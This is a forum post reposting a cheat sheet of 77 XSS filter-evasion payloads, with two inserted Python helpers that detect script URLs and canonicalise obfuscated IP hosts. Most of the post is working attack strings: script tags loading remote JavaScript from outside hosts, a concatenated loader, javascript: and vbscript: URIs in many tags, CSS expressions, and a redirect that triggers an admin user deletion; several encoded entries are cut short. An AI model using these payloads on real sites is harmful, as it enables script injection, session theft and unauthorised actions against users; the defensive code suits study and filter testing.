China Network Penetration Testing Alliance
Title:
XSS cross-site scripting attack roundup
Author:
admin
Time:
2012-9-5 14:56
It seems there isn't much XSS material on t00ls, so when I saw something good I copied it over, in case any of you want to bookmark it.

(1) Plain XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript directive

<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no semicolon, no quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (the semicolons are required)

<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)

<IMG SRC=jav..(omitted)..S')>

(9) 7-digit UTF-8 Unicode encoding, without semicolons (calculator)

<IMG SRC=jav..(omitted)..S')>
(10) Hex encoding, also without semicolons (calculator)

<IMG SRC=java..(omitted)..XSS')>

(11) Embedded tab, splitting up the JavaScript

<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript

<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return

<IMG SRC="jav ascript:alert('XSS');">

(15) Multiline embedded JavaScript injection; this is an extreme XSS example

<IMG SRC="javascript:alert('XSS')">

(16) Getting around character limits (all pieces must be on the same page)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters have basically no effect domestically, because there is nowhere they can be exploited

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in the IMG tag

<IMG SRC=" javascript:alert('XSS');">
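Entries (3) to (19) all rely on the same browser behaviour: character references are decoded, tab, newline, carriage return and NUL are discarded inside the URL, leading controls and spaces are trimmed, and the scheme is matched case-insensitively, so a filter that inspects the raw attribute value misses them. The following is an added example, not part of the original post: a normaliser that applies those browser rules before checking the scheme. The attribute list in _URL_ATTR and the SAMPLE fragment are my own assumptions.

```python
import html
import re

# Schemes that run script when a browser loads them from an attribute.
SCRIPT_SCHEMES = ("javascript:", "vbscript:")

# Attributes the entries use as script carriers (assumed list; extend as needed).
_URL_ATTR = re.compile(
    r"\b(?:src|href|background|dynsrc|lowsrc)\s*=\s*"
    r"(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))",
    re.IGNORECASE,
)
# Every C0 control plus space: what browsers trim from both ends of a URL.
_EDGE_CHARS = "".join(chr(c) for c in range(0x21))

def normalize_url_attribute(value: str) -> str:
    """Canonicalise an attribute value the way a lenient browser does
    before it decides which scheme it is looking at."""
    # 1. Resolve character references: decimal or hex, with or without the
    #    trailing semicolon, zero-padded or not (entries 5, 8, 9, 10).
    value = html.unescape(value)
    # 2. Drop tab, LF, CR and NUL anywhere in the value (entries 11-14, 17, 18).
    value = re.sub(r"[\t\n\r\x00]", "", value)
    # 3. Trim leading/trailing controls and spaces (entry 19).
    value = value.strip(_EDGE_CHARS)
    # 4. Scheme comparison is case-insensitive (entry 4).
    return value.lower()

def is_script_url(value: str) -> bool:
    """True if the attribute value resolves to a script-executing scheme."""
    return normalize_url_attribute(value).startswith(SCRIPT_SCHEMES)

def find_script_urls(fragment: str) -> list:
    """Raw attribute values in an HTML fragment that would run script once
    normalised. Unquoted values end at whitespace or '>'."""
    hits = []
    for m in _URL_ATTR.finditer(fragment):
        raw = next(g for g in m.groups() if g is not None)
        if is_script_url(raw):
            hits.append(raw)
    return hits

# Constructed fragment modelled on the entries above (not taken from the page).
SAMPLE = (
    "<IMG SRC=JaVaScRiPt:alert('XSS')>"
    "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">"
    "<BODY BACKGROUND=\"&#14;  vbscript:msgbox(1)\">"
    "<IMG SRC=\"https://example.com/a.png\">"
    "<IMG SRC=\"java script:alert(1)\">"  # an interior space is not stripped
)
```

find_script_urls(SAMPLE) returns the first three attribute values; the plain https URL and the value with an interior space are left alone, since browsers do not strip a regular space inside the scheme.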
(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3

<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets

<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escapes

\";alert('XSS');//

(30) Closing the TITLE tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image

<INPUT SRC="javascript:alert('XSS');">

(32) BODY image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag

<BODY('XSS')>

(34) IMG DYNSRC

<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC

<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND

<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript

<IMG SRC='vbscript:msgbox("XSS")'>

(41) META link URL

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) FRAME

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression

<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression

<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made up of an open angle bracket followed by a letter)

<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method

expression(alert("XSS"))'>

(53) STYLE background

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE

<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag; you can embed a Flash file that contains the XSS

<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) ActionScript inside Flash can be used to smuggle in your XSS code

a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the HTC file must be on the same server as your XSS vector

<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS gets filtered, you can put the JS code inside an image to exploit it

<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands

<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)

Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering

<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)

<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)

<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)

<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)

<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)

<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass

<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding

<A HREF="http://3w.org">XSS</A>

(70) IP as a decimal number

<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal

<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal

<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding

<A HREF="h tt p://6 6.000146.0x7.147/">XSS</A>
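Entries (70) to (73), and the trailing-dot form in entry (76) below, work because a host allow-list or deny-list that compares strings never sees that these literals resolve to the same address. The following is an added example, not part of the original post: a canonicaliser that folds the legacy decimal, hexadecimal and octal IPv4 forms into dotted decimal before a host comparison. The parsing rules follow the WHATWG URL parser's IPv4 handling; the function names and SAMPLE_URLS are my own.

```python
import re
import ipaddress
from urllib.parse import urlsplit

# One dotted part: hex (0x..), octal (leading 0) or decimal, as the WHATWG
# URL parser still accepts them for compatibility with old resolvers.
_PART = re.compile(r"^(?:0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)$")

def _part_value(part: str) -> int:
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if part.startswith("0"):
        return int(part, 8)
    return int(part)

def parse_legacy_ipv4(host: str):
    """Parse the shorthand forms browsers accept: one to four parts in any
    base, the last part filling all remaining bytes ('3232235521' and
    '192.168.1' are both 192.168.0.1). None if host is not such a literal."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(_PART.match(p) for p in parts):
        return None
    values = [_part_value(p) for p in parts]
    n = 0
    for v in values[:-1]:
        if v > 255:  # only the last part may exceed one byte
            return None
        n = n * 256 + v
    tail_bytes = 5 - len(parts)  # bytes the last part has to fill
    if values[-1] >= 256 ** tail_bytes:
        return None
    return ipaddress.IPv4Address(n * 256 ** tail_bytes + values[-1])

def canonical_host(host: str) -> str:
    """The form an allow/deny list should compare: legacy IP literals become
    dotted decimal; names are lower-cased and lose a trailing dot (entry 76).
    'www.google.com' and 'google.com' remain distinct names (entry 75)."""
    host = host.strip().lower().rstrip(".")
    ip = parse_legacy_ipv4(host)
    return str(ip) if ip is not None else host

def canonical_host_of(url: str) -> str:
    """Canonical host of a URL, including scheme-relative '//host/' (entry 74)."""
    return canonical_host(urlsplit(url).hostname or "")

# Constructed URLs modelled on entries 70-76 (not taken from the page).
SAMPLE_URLS = ["http://3232235521/", "http://0xc0.0xa8.0x00.0x01/",
               "http://0300.0250.0000.0001/", "http://66.000146.0x7.147/",
               "//www.google.com/", "http://www.google.com./"]
```

The first three sample URLs all canonicalise to 192.168.0.1, the mixed-base one to 66.102.7.147, and the last two to www.google.com, which is what a comparison against a host list has to be made on.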
(74) Omitting [http:]

<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]

<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name with a trailing dot

<A HREF="http://www.google.com./">XSS</A>

(77) javascript link

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
Welcome to China Network Penetration Testing Alliance (https://cobjon.com/)
Powered by Discuz! X3.2